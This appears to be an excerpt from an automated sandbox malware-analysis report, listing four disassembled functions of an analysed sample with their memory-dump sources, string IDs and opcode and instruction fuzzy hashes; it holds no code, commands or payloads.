                              Function 6C9843F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C9843F9
                                • Part of subcall function 6C984320: __EH_prolog.LIBCMT ref: 6C984325
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction ID: 08b092ecda8e0a987b9d9825944d5d5ed75584da7cd285aea7ce5e3ac3338def
                              • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction Fuzzy Hash: 15F08C72611014FFCB069F94DC04BDEBBB9FF69314F00842AF605A6650CBB5AA14CB98
                              Function 6C97A143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 18007efcf396e858ff6d07b7a1d8b2da842fc1656ca31070aa65893d1aea21f1
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: EEE09232A165109FEB28DF48D820BDEF7A8EFA5724F11411FE011A7B52CFB1E910C6A4
                              Function 6C9A4E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 43b9387fb6a5cdeb068cbd5280a64c9a40910ac5aa2fd5a5f7d8f31f3b5a1c68
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: BF51DE309042099BCF11CF94D940BDEB7B9EF3931CF10942AE81567A91DF71E96ACB91
                              Function 6C9C4F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.1599126789.000000006C948000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C948000, based on PE: true
                              • Associated: 0000000B.00000002.1599763936.000000006CA13000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 0000000B.00000002.1599799099.000000006CA19000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6c790000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: e61305e5267cb88c1919b8049ea52a3630652fd8780bc310d575b98f6d55e603
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: 91F01DB06017009FC3208F05D54879BB7F4EB55709F50CD1EE19A9BA40D3B8E5088FA9